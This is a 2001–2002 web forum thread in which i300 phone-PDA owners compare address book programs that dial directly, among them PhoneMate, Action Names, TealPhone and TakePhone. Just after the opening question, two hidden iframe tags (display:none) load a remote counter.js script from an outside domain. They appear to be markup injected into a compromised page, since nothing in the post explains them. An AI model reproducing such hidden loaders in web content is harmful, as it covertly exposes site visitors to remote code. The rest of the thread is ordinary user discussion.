+ Reply to Thread
Page 1 of 2 1 2 LastLast

Lightbulb Replacement address book program?

Is there any other address book program that allows you to select a contact, then dial a phone number direct from the program?

I'd like to be able to sort my address book by first name, and i don't want to give up that feature...

Ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PhoneMate

I have enjoyed using PhoneMate

It is not perfect, but nothing finds names in large address books faster. There is no need to resort your address book, just select the letters for the first name, last name, or business name, and whalla -- I find most names in my 450 entry address book within 3-4 keystrokes. And if you set the option for selecting a record to "edit" it will bring up the entry in your regular address book, from where you can press the phone icon. This part is a bit hard to do with your finger, because the phone icon is small, but it is the best option I have found. I have noticed that if I miss the phone icon with my finger, it goes into edit mode, and I can more easily hit "Done", at which point the entry I had selected is highlighted in the phone book list, and I can the voice dial and arrow buttons to select and dial the desired number error free -- so with a few extra keystrokes, I am there. These are all workarounds, and I hope the program will eventually support the I300 the way it does the Kyo6035. But for now, it works for me.

I would suggest you give it a try and see how you like it.

PhoneMate, or new group

I also used PhoneMate, and really like that application. If it supported the I-300 for direct dialing, I would have purchased it. Hopefully it will soon - I will definitely be buying a copy then.

I, too, tried the "edit" thing with PhoneMate to get to the regular datebook app - but the phone icon to dial a number is just way too small to hit with a finger. So I've taken an alternate approach (this may or may not help you).

I've got an address book with 400+ names. I probably have only used 10% of the contacts within the past year - so there was no point in cycling through the entire list via one-handed dialing. So, I made a new filing category called "AccessQuick" (it needs to start with the beginning of the alphabet) that has all the numbers that I"m likely to need (about 40). Now when I want to dial, I hit the phone book hard button twice (once to switch to the app, the second time switches to the "AccessQuick" group). Then, it's a simple operation to use one-handed dialing to get through 40 numbers.

Good luck!

-Doug

Tealphone/addressbook

I too wish i could use tealphone to dial numbers but until then...making a category for your frequently called numbers seems the best bet, however you can avoid the extra press of a button by setting prefs to "remember category" or something like that. Then, when I switch to my address book it is already on the list of "frequent" numbers.

Gregg

You might try this one...

...Action Names Datebook - go to www.iambic.com - it has dialing from the contact view, as well as TONS of sorting entries. You could order the list by first/last, by company name, etc, and then dial from the list. Their new release, 5.0, supports dialing with a Kyocera, but not, I think, from an I-300. I think they're working on that now. They also have a discussion forum, where that topic has come up....

Re: You might try this one...

Originally posted by nrosser
    ...Action Names Datebook - go to www.iambic.com - it has dialing from the contact view, as well as TONS of sorting entries. You could order the list by first/last, by company name, etc, and then dial from the list. Their new release, 5.0, supports dialing with a Kyocera, but not, I think, from an I-300. I think they're working on that now. They also have a discussion forum, where that topic has come up....
    I agree -- Action Names is really nice, and has proven to be very stable so far. Highly recommended!

Craig

Act Names and Phonemate

I can't get Act Names to dial. Has anyone gotten version 5.0 to dial with the I300??? I have emailed the vendor to ask if they will be supporting the Samsung.

I also can't get Phonemate to dial. Anyone have any luck???

Rick
    rc97h@aol.com

AN = no go on the I300

My understanding after checking out the posts on the Iambic forum is that Iambic doesn't yet support the I300. I think you can check out the forum at iambic.com/forum, or something like that.

Re: Act Names and Phonemate

Originally posted by rickeeee
    I can't get Act Names to dial. Has anyone gotten version 5.0 to dial with the I300??? I have emailed the vendor to ask if they will be supporting the Samsung.

I also can't get Phonemate to dial. Anyone have any luck???

Rick
    rc97h@aol.com
    No problem here....

Reply from Action Names

I don't think ANYONE is able to use Action Names to dial yet, even with version 5.0.

Here is the email and reply I received from the vendor that publishes Action Names:

Subj: Re: Please Advise
    Date: 12/15/2001 11:39:23 AM Pacific Standard Time
    To: Rc97h@aol.com
    Sent from the Internet (Details)

Hello,

Our developers are currently working with Samsung to implement this feature. If you have any further questions, feel free to contact me.

Thanks,

Darin Brown
    Shipping/Sales
    iambic Software

At 09:40 PM 12/13/01 -0500, you wrote:

Please advise if Action Names will be modified to support the Samsung/Palm I300 Phone...... Would love it to dial the phone numbers!

I hope so!!!!

Any Luck Out There

It's been a little while since the latest post on this thread, and I was wondering if anyone has found a good dialer, since. Both TakePhone and PhoneMate look great, but don't dial. It sure would be nice to have a single-handed-no-stylus way of drilling through my address book,
    I got your pithy sigfile right here.

I am using TahePhone and it dial , it is the best adressbook program i found , so i decided to buy it.
    Marc-André Pïlon

TealPhone
    Marc,

I'm testing that one, too, but I always get a port error when I attempt to dial. Was there some kind of trick to setting it up?

r

(Click a sponser today!)
    Try AddressPlus. I've been Beta testing it for the developer and his latest works great! It has quick sorting by Last Name, Company/Last, Company/First, or First Name. I don't see the latest version posted on his web site, yet, but you may contact him directly:

Paul Taylor <ptaylor@addressplus.net>

He has a 30 day demo and it's only $8 to buy($12 if you want to add his handy AME category editor). Works best in his "Show names only" mode - you press the "secret" space just to the left of where the Note icon goes and it brings up all numbers for that particular entry. Tap the number and you're dialing!
    Gary

From another thread:

http://www.sphi300.com/showthread.ph...ight=tealphone

I have always been a fan of TealPhone (www.tealpoint.com) since I first had my palm III and they recently release a beta version (3.52 is the current version, v3.55 is the beta and it' status is listed as "pending Final Testing") that supports dialing on i300.

I have been running the Beta for a couple of days now and haven't run into any problems...

If you decide to try the beta (www.tealpoint.com/beta/tealphon.zip) before the final release , the doc for the beta hasn't been updated so once installed you have to go to the menu, Action, Dialing Connection... and under the 'Driver' section you will see a selection for 'Samsung i300' that you will have to select before dialing works through TealPhone.

With the 'Dial on hardware button hold' and 'Convert letters to numbers' selected, I now use it exclusively and no longer access the standard address book at all.

It even comes with it's own dial pad, which has the novelty of being able to dial by name or company by spelling it on the number pad. Other than that though, the number pad kinda sticks.

My two cents.

Danny

Yeah - I'm running TealPhone, but I can't get it to dial. Always get some kind of port error. Did those of you that got it to run have to do anything crafty?

r

I bought TakePhone and it has made one handed dialing really easy. As of today, I set my hard address button to launch it, (I has set a silkscreen stroke until now, which doesn't work from phoneapp). It works pretty well and the developer has seemed anxious to refine it for i300 users.

I thought TakePhone looked pretty good, almost as good as PhoneMate, but it doesn't dial (either).

eSiddur: You mentioned that the developer was intent on porting to the i300. Did he mention a time line?

takephone

He already has released several working beta versions. I bought it and have been using it very happily for over a week. There are no conflicts on my phone at all (I have the IU s/w version).

I don't believe the beta is a limited test; any registered user willing to use it should be able to get it.

iambic actionames

I got the same response from iambic, but someone said on another thread that it was working already, so I tried it. Sure enough, its already implemented! It has changed how I use my i300 altogether: I can schedule calls etc., click on the item, click on the small "view contact" icon (the only drawback with the system is that this icon is so small, IMO) choose "dial" and voila, call my appointments.

I spent $30 on ActionNames and TakePhone combined and my usability of my i300 has increased manyfold. Money well spent.
    Last edited by eSiddur; 03-07-2002 at 09:13 AM.